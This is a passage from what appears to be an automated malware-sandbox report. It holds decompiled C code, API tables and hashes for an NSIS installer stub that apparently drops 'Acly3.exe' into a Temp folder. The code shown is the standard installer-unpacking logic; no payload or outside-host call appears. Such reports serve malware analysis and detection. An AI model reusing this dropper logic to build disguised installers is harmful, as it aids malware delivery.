							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x20207
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x2020b
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                                            0x00403085
                                                                            0x00403088
                                                                            0x0040308b
                                                                            0x004030a5
                                                                            0x004030aa
                                                                            0x004030bd
                                                                            0x004030c2
                                                                            0x004030c5
                                                                            0x004030cb
                                                                            0x00000000
                                                                            0x004030cd
                                                                            0x004030de
                                                                            0x004030ef
                                                                            0x004030f6
                                                                            0x004030fc
                                                                            0x004030fe
                                                                            0x00403103
                                                                            0x00403105
                                                                            0x004031f0
                                                                            0x004031f2
                                                                            0x004031f7
                                                                            0x004031fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403200
                                                                            0x00403203
                                                                            0x00403227
                                                                            0x00403227
                                                                            0x0040322c
                                                                            0x00403232
                                                                            0x0040323d
                                                                            0x00403242
                                                                            0x00403242
                                                                            0x00403245
                                                                            0x00403246
                                                                            0x00403247
                                                                            0x00403249
                                                                            0x0040324e
                                                                            0x00403251
                                                                            0x00403264
                                                                            0x00403268
                                                                            0x00403270
                                                                            0x00403275
                                                                            0x00403277
                                                                            0x00403277
                                                                            0x00403277
                                                                            0x0040327f
                                                                            0x0040327f
                                                                            0x00403282
                                                                            0x00403283
                                                                            0x00403283
                                                                            0x00403286
                                                                            0x00403288
                                                                            0x00403288
                                                                            0x00403288
                                                                            0x00403292
                                                                            0x00403298
                                                                            0x004032a6
                                                                            0x004032ab
                                                                            0x00000000
                                                                            0x004032ab
                                                                            0x00000000
                                                                            0x00403251
                                                                            0x0040320b
                                                                            0x00403216
                                                                            0x0040321b
                                                                            0x0040321d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403222
                                                                            0x00403225
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040310b
                                                                            0x00403110
                                                                            0x00403115
                                                                            0x00403119
                                                                            0x00403120
                                                                            0x00403125
                                                                            0x00403127
                                                                            0x00403129
                                                                            0x00403129
                                                                            0x0040312d
                                                                            0x00403132
                                                                            0x00403134
                                                                            0x0040325c
                                                                            0x00403253
                                                                            0x00000000
                                                                            0x00403253
                                                                            0x0040313a
                                                                            0x00403141
                                                                            0x004031bd
                                                                            0x004031c1
                                                                            0x004031c5
                                                                            0x004031ca
                                                                            0x00000000
                                                                            0x004031c1
                                                                            0x0040314a
                                                                            0x0040314f
                                                                            0x00403152
                                                                            0x00403157
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403159
                                                                            0x00403160
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403162
                                                                            0x00403169
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040316b
                                                                            0x00403172
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403174
                                                                            0x0040317b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040317d
                                                                            0x00403183
                                                                            0x0040318c
                                                                            0x00403192
                                                                            0x00403195
                                                                            0x00403197
                                                                            0x0040319d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031a3
                                                                            0x004031a7
                                                                            0x004031af
                                                                            0x004031af
                                                                            0x004031b2
                                                                            0x004031b5
                                                                            0x004031b7
                                                                            0x004031b9
                                                                            0x004031b9
                                                                            0x00000000
                                                                            0x004031b7
                                                                            0x004031a9
                                                                            0x004031ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004031cb
                                                                            0x004031cb
                                                                            0x004031d1
                                                                            0x004031dd
                                                                            0x004031dd
                                                                            0x004031e0
                                                                            0x004031e6
                                                                            0x004031e6
                                                                            0x004031e6
                                                                            0x004031ee
                                                                            0x004031ee
                                                                            0x00000000
                                                                            0x004031ee

                                                                            APIs
                                                                            • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                            Strings
                                                                            • }8@, xrefs: 00403227, 00403242
                                                                            • soft, xrefs: 0040316B
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                                                                            • Inst, xrefs: 00403162
                                                                            • Error launching installer, xrefs: 004030CD
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                                                            • Null, xrefs: 00403174
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                            • API String ID: 2803837635-3947366757
                                                                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004032B4, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 95%
                                                                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t101 =  *0x40ce60 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 =  *0x40ce60;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}























                                                                            0x004032bf
                                                                            0x004032c3
                                                                            0x004032c6
                                                                            0x004032cb
                                                                            0x004032cd
                                                                            0x004032cd
                                                                            0x004032d4
                                                                            0x004032d8
                                                                            0x004032dd
                                                                            0x004032df
                                                                            0x004032df
                                                                            0x004032e6
                                                                            0x004032eb
                                                                            0x004032f6
                                                                            0x004032f6
                                                                            0x00403308
                                                                            0x004034bd
                                                                            0x004034bd
                                                                            0x00000000
                                                                            0x0040330e
                                                                            0x00403312
                                                                            0x0040346a
                                                                            0x004034ad
                                                                            0x004034af
                                                                            0x004034af
                                                                            0x004034bb
                                                                            0x004034c2
                                                                            0x004034c5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004034bb
                                                                            0x0040346f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403471
                                                                            0x00403474
                                                                            0x00403477
                                                                            0x0040347a
                                                                            0x0040347c
                                                                            0x0040347c
                                                                            0x0040348c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040349a
                                                                            0x00403464
                                                                            0x00403464
                                                                            0x004034bf
                                                                            0x004034bf
                                                                            0x00000000
                                                                            0x004034bf
                                                                            0x0040349c
                                                                            0x0040349f
                                                                            0x004034a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004034a8
                                                                            0x00000000
                                                                            0x00403474
                                                                            0x0040331e
                                                                            0x00403320
                                                                            0x00403327
                                                                            0x0040332e
                                                                            0x0040332e
                                                                            0x00403335
                                                                            0x0040333d
                                                                            0x00403347
                                                                            0x0040334c
                                                                            0x00403354
                                                                            0x0040335e
                                                                            0x00403361
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403367
                                                                            0x00403367
                                                                            0x00403367
                                                                            0x0040336f
                                                                            0x00403371
                                                                            0x00403371
                                                                            0x00403382
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403388
                                                                            0x0040338b
                                                                            0x00403391
                                                                            0x00403397
                                                                            0x00403397
                                                                            0x004033a2
                                                                            0x004033a8
                                                                            0x004033ad
                                                                            0x004033b4
                                                                            0x004033b7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033c3
                                                                            0x004033c5
                                                                            0x004033ce
                                                                            0x004033d0
                                                                            0x00403401
                                                                            0x00403407
                                                                            0x00403413
                                                                            0x00403418
                                                                            0x00403418
                                                                            0x0040341d
                                                                            0x00403458
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040341f
                                                                            0x00403423
                                                                            0x0040343f
                                                                            0x00403442
                                                                            0x00403445
                                                                            0x00403448
                                                                            0x0040344c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403452
                                                                            0x0040342c
                                                                            0x00403433
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403435
                                                                            0x00000000
                                                                            0x00403435
                                                                            0x0040341d
                                                                            0x00403460
                                                                            0x00000000
                                                                            0x00403460
                                                                            0x00000000
                                                                            0x00403367

                                                                            APIs
                                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                                                                            • GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
                                                                            • MulDiv.KERNEL32 ref: 004033EE
                                                                            • wsprintfW.USER32 ref: 00403401
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: *B$ A$ A$... %d%%$NB10$}8@
                                                                            • API String ID: 551687249-1489162347
                                                                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040176F, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 75%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\Users";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D(0x40b5f0, _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, 0x40b5f0);
						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                            0x0040176f
                                                                            0x00401776
                                                                            0x00401782
                                                                            0x00401785
                                                                            0x0040178a
                                                                            0x0040178d
                                                                            0x00401794
                                                                            0x004017b0
                                                                            0x00401796
                                                                            0x00401797
                                                                            0x00401797
                                                                            0x004017b6
                                                                            0x004017bb
                                                                            0x004017bb
                                                                            0x004017bf
                                                                            0x004017c2
                                                                            0x004017c7
                                                                            0x004017c9
                                                                            0x004017cb
                                                                            0x004017d0
                                                                            0x004017d0
                                                                            0x004017db
                                                                            0x004017db
                                                                            0x004017ec
                                                                            0x004017ee
                                                                            0x004017ee
                                                                            0x004017ef
                                                                            0x004017ef
                                                                            0x004017f2
                                                                            0x004017f5
                                                                            0x004017f8
                                                                            0x004017f8
                                                                            0x004017ff
                                                                            0x0040180e
                                                                            0x00401813
                                                                            0x00401816
                                                                            0x00401819
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040181b
                                                                            0x0040181e
                                                                            0x00401874
                                                                            0x00401879
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2a
                                                                            0x00402c2d
                                                                            0x00402c2d
                                                                            0x00000000
                                                                            0x00401820
                                                                            0x00401826
                                                                            0x0040182d
                                                                            0x0040183a
                                                                            0x00401845
                                                                            0x0040185b
                                                                            0x0040185b
                                                                            0x0040185e
                                                                            0x00000000
                                                                            0x00401864
                                                                            0x00401864
                                                                            0x00401865
                                                                            0x00401882
                                                                            0x00402c33
                                                                            0x00402c33
                                                                            0x00402c33
                                                                            0x00401867
                                                                            0x00401867
                                                                            0x00401868
                                                                            0x00401493
                                                                            0x0040239d
                                                                            0x0040239d
                                                                            0x0040239d
                                                                            0x00401865
                                                                            0x0040185e
                                                                            0x00402c35
                                                                            0x00402c39
                                                                            0x00402c39
                                                                            0x00401892
                                                                            0x00401897
                                                                            0x004018a5
                                                                            0x004018aa
                                                                            0x004018b0
                                                                            0x004018b4
                                                                            0x004018b6
                                                                            0x004018be
                                                                            0x004018ca
                                                                            0x004018b8
                                                                            0x004018b8
                                                                            0x004018bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018bc
                                                                            0x004018d3
                                                                            0x004018d9
                                                                            0x004018db
                                                                            0x00000000
                                                                            0x004018e1
                                                                            0x004018e1
                                                                            0x004018e4
                                                                            0x004018fc
                                                                            0x004018e6
                                                                            0x004018e9
                                                                            0x004018f2
                                                                            0x004018f2
                                                                            0x00401901
                                                                            0x00401906
                                                                            0x00402398
                                                                            0x00000000
                                                                            0x00402398
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrcatW.KERNEL32 ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\Acly3.exe,00441000,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 1941528284-400902675
                                                                            • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                            • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040689A, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                            0x004068b1
                                                                            0x004068ba
                                                                            0x004068bc
                                                                            0x004068bc
                                                                            0x004068c0
                                                                            0x004068d3
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068ec
                                                                            0x00406900
                                                                            0x00406907

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                            • wsprintfW.USER32 ref: 004068EC
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
